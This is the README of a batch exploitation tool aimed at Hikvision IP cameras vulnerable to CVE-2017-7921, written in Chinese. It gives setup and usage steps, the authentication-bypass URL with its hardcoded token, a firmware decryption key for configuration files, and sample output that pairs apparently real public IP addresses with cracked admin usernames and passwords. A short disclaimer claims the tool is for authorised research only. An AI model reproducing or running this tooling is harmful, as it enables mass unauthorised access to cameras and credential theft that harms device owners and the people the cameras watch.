安全声明:本工具仅供授权安全研究与漏洞验证使用
重要提示:使用本工具即表示您同意以下条款
本项目遵循 GitHub 安全研究政策 及 海康威视安全响应中心 的披露规范。
针对海康威视IP摄像头 CVE-2017-7921 身份验证绕过漏洞的批量检测与验证工具,支持配置文件的自动解密与凭证提取。
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
在工具目录下创建 zc/ 文件夹,将设备列表以JSON格式放入(每行一个设备对象):
mkdir zc
文件示例: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
字段说明:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
海康威视摄像头配置文件漏洞批量扫描工具
════════════════════════════════════════════════════════════════════════════════
可用的JSON文件:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 字节)
════════════════════════════════════════════════════════════════════════════════
请选择文件编号: 1
已选择文件: devices_2025.json
正在加载设备数据...
待扫描设备总数: 2000
请输入并发线程数 (默认: 5): 10
并发线程数: 10
开始扫描...
已扫描设备总数: 2000
发现漏洞设备数: 127
漏洞设备已保存到: vulnerable_devices.json
扫描完成后生成 vulnerable_devices.json,包含所有存在漏洞的设备信息。
示例输出:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK 使用硬编码凭证279977f62f6cfd2d91cd75b889ce0c9a 硬编码在固件中0x73, 0x8B, 0x55, 0x44)本软件仅供授权安全研究和教育用途。使用者应自行确保符合所有适用法律。
最后更新:2025-01-29 | 版本:v1.0.0 | 支持CVE:CVE-2017-7921
| 字段 | 说明 | 必需 |
|---|
link | 设备HTTP/HTTPS访问地址 | ✅ 是 |
city | 城市信息 | ❌ 否 |
country | 国家代码 | ❌ 否 |
org | 组织/ISP信息 | ❌ 否 |